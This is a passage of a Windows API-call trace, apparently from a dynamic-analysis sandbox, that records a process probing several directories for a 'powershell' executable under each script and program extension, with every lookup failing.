	[0812.303] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.697] SetErrorMode (uMode=0x1) returned 0x1
	[0813.699] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0813.699] SetErrorMode (uMode=0x1) returned 0x1
	[0813.699] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.708] SetErrorMode (uMode=0x1) returned 0x1
	[0813.709] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0813.709] SetErrorMode (uMode=0x1) returned 0x1
	[0813.710] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.718] SetErrorMode (uMode=0x1) returned 0x1
	[0813.719] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0813.720] SetErrorMode (uMode=0x1) returned 0x1
	[0813.720] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.728] SetErrorMode (uMode=0x1) returned 0x1
	[0813.730] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0815.119] SetErrorMode (uMode=0x1) returned 0x1
	[0815.120] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.128] SetErrorMode (uMode=0x1) returned 0x1
	[0815.129] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0815.129] SetErrorMode (uMode=0x1) returned 0x1
	[0815.129] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.137] SetErrorMode (uMode=0x1) returned 0x1
	[0815.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.139] SetErrorMode (uMode=0x1) returned 0x1
	[0815.139] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.139] SetErrorMode (uMode=0x1) returned 0x1
	[0815.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.140] SetErrorMode (uMode=0x1) returned 0x1
	[0815.140] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.140] SetErrorMode (uMode=0x1) returned 0x1
	[0815.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.141] SetErrorMode (uMode=0x1) returned 0x1
	[0815.141] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.141] SetErrorMode (uMode=0x1) returned 0x1
	[0815.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.141] SetErrorMode (uMode=0x1) returned 0x1
	[0815.141] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.145] SetErrorMode (uMode=0x1) returned 0x1
	[0815.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.145] SetErrorMode (uMode=0x1) returned 0x1
	[0815.145] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.146] SetErrorMode (uMode=0x1) returned 0x1
	[0815.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.146] SetErrorMode (uMode=0x1) returned 0x1
	[0815.146] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.146] SetErrorMode (uMode=0x1) returned 0x1
	[0815.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.147] SetErrorMode (uMode=0x1) returned 0x1
	[0815.147] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.147] SetErrorMode (uMode=0x1) returned 0x1
	[0815.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.147] SetErrorMode (uMode=0x1) returned 0x1
	[0815.147] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.148] SetErrorMode (uMode=0x1) returned 0x1
	[0815.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.148] SetErrorMode (uMode=0x1) returned 0x1
	[0815.148] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.148] SetErrorMode (uMode=0x1) returned 0x1
	[0815.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.149] SetErrorMode (uMode=0x1) returned 0x1
	[0815.149] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.149] SetErrorMode (uMode=0x1) returned 0x1
	[0815.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.149] SetErrorMode (uMode=0x1) returned 0x1
	[0815.150] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0816.459] SetErrorMode (uMode=0x1) returned 0x1
	[0816.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0816.460] SetErrorMode (uMode=0x1) returned 0x1
	[0816.460] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0816.460] SetErrorMode (uMode=0x1) returned 0x1
	[0816.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0816.461] SetErrorMode (uMode=0x1) returned 0x1
	[0816.461] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0816.461] SetErrorMode (uMode=0x1) returned 0x1
	[0816.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0816.461] SetErrorMode (uMode=0x1) returned 0x1
	[0816.461] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0816.462] SetErrorMode (uMode=0x1) returned 0x1
	[0816.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0816.462] SetErrorMode (uMode=0x1) returned 0x1
	[0816.462] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0816.462] SetErrorMode (uMode=0x1) returned 0x1
	[0816.463] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0816.463] SetErrorMode (uMode=0x1) returned 0x1
	[0816.463] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0816.463] SetErrorMode (uMode=0x1) returned 0x1
	[0816.463] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0816.464] SetErrorMode (uMode=0x1) returned 0x1
	[0816.464] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0816.464] SetErrorMode (uMode=0x1) returned 0x1
	[0816.464] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0816.464] SetErrorMode (uMode=0x1) returned 0x1
	[0816.464] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0816.465] SetErrorMode (uMode=0x1) returned 0x1
	[0816.465] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0816.465] SetErrorMode (uMode=0x1) returned 0x1
	[0816.465] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0816.465] SetErrorMode (uMode=0x1) returned 0x1
	[0816.466] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0816.466] SetErrorMode (uMode=0x1) returned 0x1
	[0816.466] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0816.466] SetErrorMode (uMode=0x1) returned 0x1
	[0816.466] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0816.466] SetErrorMode (uMode=0x1) returned 0x1
	[0816.467] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0816.467] SetErrorMode (uMode=0x1) returned 0x1
	[0816.467] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0816.467] SetErrorMode (uMode=0x1) returned 0x1
	[0816.467] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0816.467] SetErrorMode (uMode=0x1) returned 0x1
	[0816.468] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0816.468] SetErrorMode (uMode=0x1) returned 0x1
	[0816.468] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0816.468] SetErrorMode (uMode=0x1) returned 0x1
	[0816.468] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0816.469] SetErrorMode (uMode=0x1) returned 0x1
	[0816.469] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0816.472] SetErrorMode (uMode=0x1) returned 0x1
	[0816.472] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0816.472] SetErrorMode (uMode=0x1) returned 0x1
